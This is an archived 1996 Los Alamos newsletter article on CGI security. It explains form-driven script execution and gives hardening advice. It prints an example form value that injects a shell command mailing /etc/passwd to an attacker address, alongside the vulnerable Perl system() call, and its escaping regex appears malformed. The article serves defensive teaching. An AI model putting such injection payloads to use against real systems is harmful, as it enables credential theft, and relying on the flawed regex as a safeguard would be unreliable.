The Wayback Machine - https://web.archive.org/web/20000416053740/http://www.lanl.gov:80/projects/ia/library/bits/bits0396.html

CGI Security

March 1996 BITS: computing and communications news

The Common Gateway Interface (CGI) is what, for now at least, makes the World Wide Web interactive. CGI enables users to do more than simply read static files; it enables them to perform tasks such as searching for information, filling out and submitting forms, and more.

This capability makes the Web a far more useful place and has been widely adopted by the Internet community. Throughout the universities, laboratories, companies, and other organizations that comprise the Web, CGI scripts are developed, refined, shared--and sometimes compromised.

For the Laboratory, too, CGI is a widely used tool. As always, and especially at an institution such as the Laboratory, whenever you allow somebody to execute tasks on your machine, you're opening a potential security hole and you need to make sure it's adequately plugged.

The Mechanism

Basically, there are two parts to a CGI "script": an executable (the script itself) and an HTML page that drives the executable. The executable can be just about anything that runs, including system calls, Perl scripts, shell scripts, and compiled programs (C, Pascal, etc.).

The HTML page is actually optional. CGI scripts can be used without user input to increment page counters, display the day and date, etc. If the user is to enter any information, however, the HTML page is needed.

When both parts are properly constructed, the CGI action is performed as follows (as illustrated by a form submission):

The user pulls the HTML form page from the server onto his/her client machine (see Figure 1).
The user fills out the form on the client machine.
The user presses "Submit", which then sends an execute request to the server. (The client-side browser interprets the form into an execute request, which identifies the server-side program and includes the information that was filled into the form.)
The server executes the requested program.

Figure 1: CGI Execution Cycle

The same basic process occurs for other CGI scripts that accept user input. A clickable imagemap, for example, sends the image to the client machine and issues an execute request that specifies which part of the image was clicked on.

The fundamental strength of CGI is its simplicity. Entering information on the form and all other manipulation is performed on the client machine, so the server doesn't have to worry about it. All that the server has to do is to execute the request when it is issued.

Therein also lies the fundamental security weakness within CGI. Because the HTML page itself is transferred to the client machine, the user has an unrestricted ability to edit the page at will and to enter whatever he/she pleases. The execute request might easily be a good deal different from what you expect.

A Simple Shell Breach

The most commonly cited examples of CGI security breaches involve cajoling the shell into performing something unexpected. For instance, let's say we want a form that lets a user e-mail a message to a specified person. In our HTML form page, we might write something like the following:

<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov">Alan Arkin<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="lball@lanl.gov">Lucille Ball<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George Burns

Now let's say we execute a script that writes the message to a temporary file and then e-mails that file to the selected address. In Perl, this could be done with

system("/usr/lib/sendmail -t $send_to < $temp_file");

As long as the user selects from the addresses that are given, everything will work fine. There is however no way to be sure. Because the HTML form itself has been transferred to the user's client machine, he/she is free to edit it to read something like

<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd"> Alan Arkin<br>

As soon as this gets sent, the original sendmail call will stop at the semicolon, and the system will execute the next command--which would mail the password file to the user, who could then easily decrypt it and use it to gain login access to your machine.

Other Breaches

The above example is not the only thing that can go wrong. Aside from capturing a password file, malicious users can also exploit poorly defended CGI to

Access other sensitive files;
Install and execute their own programs on your system (including "Trojan Horses" that monitor system activity and report back to the user);
Install other viruses; or
Gain an overall map of your filesystem in order to search for potential weaknesses.

Also, not all of the weaknesses are at the system level (and UNIX isn't the only vulnerable operating system). Other vulnerabilities that have been identified include the following:

Certain mail programs allow a ~ to execute arbitrary programs.
Server-side includes have been tricked into executing commands embedded within HTML comments in the input (e.g., ).
C programs that "forgot" array boundaries have been tricked into executing programs via very long input.
Some early sendmail programs allowed any user to execute arbitrary programs.

This is by no means a complete list. More breaches have been identified; others have been invented but not yet identified; still others have not yet been invented. The basic point, however, remains the same: CGI should always be used with caution.

How to Make Your CGI Secure

As with other areas of computer security, the basic idea behind securing CGI is to understand the demonstrated and potential threats, to counter these threats, and to monitor system activity for unusual events.

Start with an adequately secured server. This includes appropriate screening at the router, turning off un-needed daemons, creating a non-privileged WWW user and group, and restricting the file system. Additional precautions may be required, depending upon the partition in which you are working, who the intended audience is, and the sensitivity level of the data on the machine. These precautions including monitoring who accesses the scripts and the other activities those users perform, and consulting with your computer security officer as needed.

Beyond the basics, there are other methods of improving CGI security.

Never Accept Unchecked Input

Always check for special characters such as ";" before you open a shell. You can do this either by restricting the input you accept or by escaping any dangerous characters. In Perl, for example, the following line escapes dangerous UNIX shell characters within a variable:

$var =~ s/([;<>\*\|`\$!#\[\]\{\}:'"]@)/\\$1/g;

Among the other things to check:

For server-side includes, check for "<" and ">" in order to identify and validate any embedded HTML tags.
For scripts that utilize e-mail, validate that the addresses are within an acceptable domain (e.g., make sure they're "@lanl.gov").
Look for any occurrence of "/../" (which might indicate that the user is attempting to access higher levels of the directory structure).
For selection lists, check to make sure that the value sent is a valid choice.

Prefer Compiled Programs to Interpreted Scripts

This is a very general guideline, by no means an ironclad "rule." The basic idea is that a compiled program (e.g., a binary executable from C) is more difficult to make sense of if a user is able to get a copy of it. This in turn makes it more difficult for the user to search for potential weaknesses within the program.

Counterbalancing this general preference are the facts that an interpreted program (e.g., Perl) is generally easier for the programmer to understand (including whoever has to support the program after it is written) and easier to test (no need to compile before each test). Hence, even though the compiled programs are generally preferred, there are many specific cases where the interpreted program is perfectly acceptable.

Avoid the Shell

Again, this is a very general guideline--more of a caution than a rule. There is nothing inherently wrong with opening a shell, provided that the security implications are understood and addressed. Frequently, though, it is easier to sidestep the shell concerns and call a program directly.

In UNIX/Perl, for example, a new shell is opened by system, exec, eval, backticks, etc. Hence, the basic weakness of the following line (taken from the above example) stems from the fact that it is operating at the system level in its own shell:

system("/usr/lib/sendmail -t $send_to < $temp_file");

A construction like the following sidesteps this weakness by calling sendmail directly:

open(MAIL, "|/usr/lib/sendmail -t");
print MAIL "To: $send_to\n";
print MAIL "$input_line_1";
...etc.
close(MAIL);

Keep in mind, however, that when you call a program directly you are in a sense trading the known security vulnerabilities of the shell for the potentially unknown vulnerabilities of the program.

Control Filesystem Permissions

Users need to execute CGI scripts, but there is no reason for them to have read or write permissions. Similarly, users need to read the HTML driver files (and to read and execute their directory), but there is no need for them to have write or execute permission to the files (or write permission to their directory).

These controls are most easily maintained as follows:

Put scripts in separate directory and set permissions for the directory and its files to rwx--x--x (or the equivalent).
If you are using compiled programs, put the source in a different directory from the compiled programs (to prevent users from "guessing" their name and accessing the source).
Do not leave old or not-yet-validated versions of scripts in the active scripts directory (including the filename~ backups that Emacs automatically makes).
Restrict permissions for HTML files to rw-r--r-- and for their directories to rwxr-xr-x (or the equivalents).
If the CGI output will be written to a file, put that file in a separate directory, assign that directory's ownership to the non-privileged WWW user, and set (umask) the permissions to rw------- for the file and rwx------ for the directory.

Validate Scripts from the Web

There are many CGI scripts freely available on the Web. While these can often serve as a good starting point, many of them come from university environments that do not have the same security concerns as the Laboratory. A number have been demonstrated to contain security holes, and some have even been found to contain Trojan Horses.

Any time you "borrow" a free script as a starting point, make sure to validate it for security. Check it as outlined above, and modify it as needed. Above all, don't run anything that contains any lines you don't understand. Don't even test it until you've figured it out--there's no telling what it might do.

Additional Information

As CGI programming has become more popular, the amount of information about it and security has grown. Good sources of information (including the sources of some of the above suggestions) include the following:

The CGI authoring newsgroup (news:comp.infosystems.www.authoring.cgi)
Lincoln Stein's "WWW Security FAQ" (http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html)
Paul Phillips' "Safe CGI Programming" (http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt)
Michael Van Biesbrouk's "CGI Security Tutorial" (a href="http://csclub.uwaterloo.ca/u/mlvanbie/cgisec/">http://csclub.uwaterloo.ca/u/mlvanbie/cgisec/)

Links to these and other security resources are available from the Information Architecture's Internet/WWW Subject Area web space--

http://www.lanl.gov/projects/ia-lanl/area/web/

For further information about the Information Architecture project itself, see

http://www.lanl.gov/projects/ia/

Or look under "What's New" from the Laboratory home page.

Tad Lane, tad@lanl.gov, (505) 667-0886
Information Architecture Standards Editor
Communications Arts and Services (CIC-1)

Nov	APR	May
	16
1999	2000	2001